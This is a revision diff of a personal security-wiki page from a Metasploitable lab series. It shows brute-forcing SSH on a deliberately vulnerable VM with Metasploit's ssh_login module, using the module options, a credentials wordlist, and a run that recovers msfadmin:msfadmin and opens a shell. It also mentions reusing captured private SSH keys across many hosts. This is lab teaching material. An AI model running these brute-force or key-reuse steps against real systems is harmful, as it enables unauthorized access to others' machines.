Metasploitable/SSH/Exploits: Difference between revisions
From charlesreid1
(Created page with "Here is a page with more info on general vulnerabilities in SSH: http://www3.physnet.uni-hamburg.de/physnet/security/vulnerability/SSH_vulnerabilities.html First, a reminder...") |
No edit summary |
||
| Line 1: | Line 1: | ||
=SSH Service Info= | |||
First, a reminder of the information nmap returned about the SSH service after a port scan: | First, a reminder of the information nmap returned about the SSH service after a port scan: | ||
| Line 10: | Line 10: | ||
</pre> | </pre> | ||
This server isn't using the | This server isn't using the 1.0 protocol, which is hopelessly broken and easy to defeat. This means getting past SSH will be (at least) mildly challenging. | ||
https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/ | ==Links with Background Info== | ||
Here is some good background info two SSH attacks: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/ | |||
The first attack is ssh_login, which allows you to use metasploit to brute-force guess SSH login credentials. | |||
* Module name is <code>auxiliary/scanner/ssh/ssh_login</code> | |||
The second attack requires a private key. If you do gain access to the private SSH keys on a machine, you can attempt to authenticate with a large number of hosts and services using that private key. | |||
* Module name is <code>auxiliary/scanner/ssh/ssh_login_pubkey</code> | |||
==Brute Force ssh_login== | |||
We already covered how to brute force the login with Hydra, [[Metasploitable/SSH/Brute Force]] | We already covered how to brute force the login with Hydra, [[Metasploitable/SSH/Brute Force]] | ||
| Line 50: | Line 60: | ||
VERBOSE => false | VERBOSE => false | ||
</pre> | </pre> | ||
Now run the attack: | |||
<pre> | |||
msf auxiliary(ssh_login) > run | |||
[*] 10.0.0.27:22 - SSH - Starting buteforce | |||
[*] Command shell session 1 opened (?? -> ??) at 2016-03-26 17:25:18 -0600 | |||
[+] 10.0.0.27:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux ' | |||
[*] Scanned 1 of 1 hosts (100% complete) | |||
[*] Auxiliary module execution completed | |||
msf auxiliary(ssh_login) > sessions -i 1 | |||
[*] Starting interaction with 1... | |||
id | |||
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) | |||
uname -a | |||
Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux ' | |||
exit | |||
[*] Command shell session 1 closed. | |||
msf auxiliary(ssh_login) > | |||
=Flags= | =Flags= | ||
{{MSFlag}} | {{MSFlag}} | ||
Revision as of 17:33, 26 March 2016
SSH Service Info
First, a reminder of the information nmap returned about the SSH service after a port scan:
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
This server isn't using the 1.0 protocol, which is hopelessly broken and easy to defeat. This means getting past SSH will be (at least) mildly challenging.
Links with Background Info
Here is some good background info two SSH attacks: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/
The first attack is ssh_login, which allows you to use metasploit to brute-force guess SSH login credentials.
- Module name is
auxiliary/scanner/ssh/ssh_login
The second attack requires a private key. If you do gain access to the private SSH keys on a machine, you can attempt to authenticate with a large number of hosts and services using that private key.
- Module name is
auxiliary/scanner/ssh/ssh_login_pubkey
Brute Force ssh_login
We already covered how to brute force the login with Hydra, Metasploitable/SSH/Brute Force
Did you know you can also brute force an SSH login with Metasploitable? Use the auxiliary/scanner/ssh/ssh_login module.
msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true yes Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts
Set this to run on the Metasploitable virtual box target:
msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf auxiliary(ssh_login) > set VERBOSE false VERBOSE => false
Now run the attack:
msf auxiliary(ssh_login) > run [*] 10.0.0.27:22 - SSH - Starting buteforce [*] Command shell session 1 opened (?? -> ??) at 2016-03-26 17:25:18 -0600 [+] 10.0.0.27:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux ' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) > sessions -i 1 [*] Starting interaction with 1... id uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) uname -a Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux ' exit [*] Command shell session 1 closed. msf auxiliary(ssh_login) >Flags
 |
Metasploit any and all resources related to metasploit on this wiki
MSF - on the metasploit framework generally
Category:Metasploit - pages labeled with the "Metasploit" category label
MSF/Wordlists - wordlists that come bundled with Metasploit
MSFVenom - msfvenom is used to craft payloads
Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
Flags · Template:MetasploitFlag · e |
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Metasploitable Databases:
Exploiting MySQL with Metasploit: Metasploitable/MySQL
Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Metasploitable Networking:
Exploiting VSFTP Backdoor: Metasploitable/VSFTP
SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force
SSH Penetration with Keys: Metasploitable/SSH/Keys
SSH Penetration with Metasploit: Metasploitable/SSH/Exploits
Brute-Forcing /etc/shadow File: Metasploitable/John Shadow File
Exploiting NFS: Metasploitable/NFS
Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services:
distcc: Metasploitable/distcc
Metasploitable Apache:
Exploiting Apache (with Metasploit): Metasploitable/Apache
Exploiting Apache (with Python): Metasploitable/Apache/Python
Tor's Hammer DoS Attack: Metasploitable/TorsHammer *
Apache DAV: Metasploitable/Apache/DAV *
Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory:
General approach to memory-based attacks: Metasploitable/Memory
Investigating memory data: Metasploitable/Volatile Data Investigation
Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing:
(Have not done much work on fuzzing Metasploitable...)
Fuzzing · American Fuzzy Lop
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
Flags · Template:MetasploitableRedTeamFlag · e |
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue.
Overview: Metasploitable/Defenses
Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses:
Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation
Linux Artifact Investigation: Metasploitable/Artifact Investigation
Linux Iptables Essentials: Metasploitable/Iptables
Firewall Assurance and Testing: Metasploitable/Firewall
Password Assessment: Metasploitable/Password Assessment
Standard Unix Ports: Unix/Ports
Metasploitable Networking Defenses:
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat
Nmap (Blue Team): Metasploitable/Nmap
Network Traffic Analysis: Metasploitable/Network Traffic Analysis
Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns
Snort IDS: Metasploitable/Snort
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
Flags · Template:MetasploitableBlueTeamFlag · e |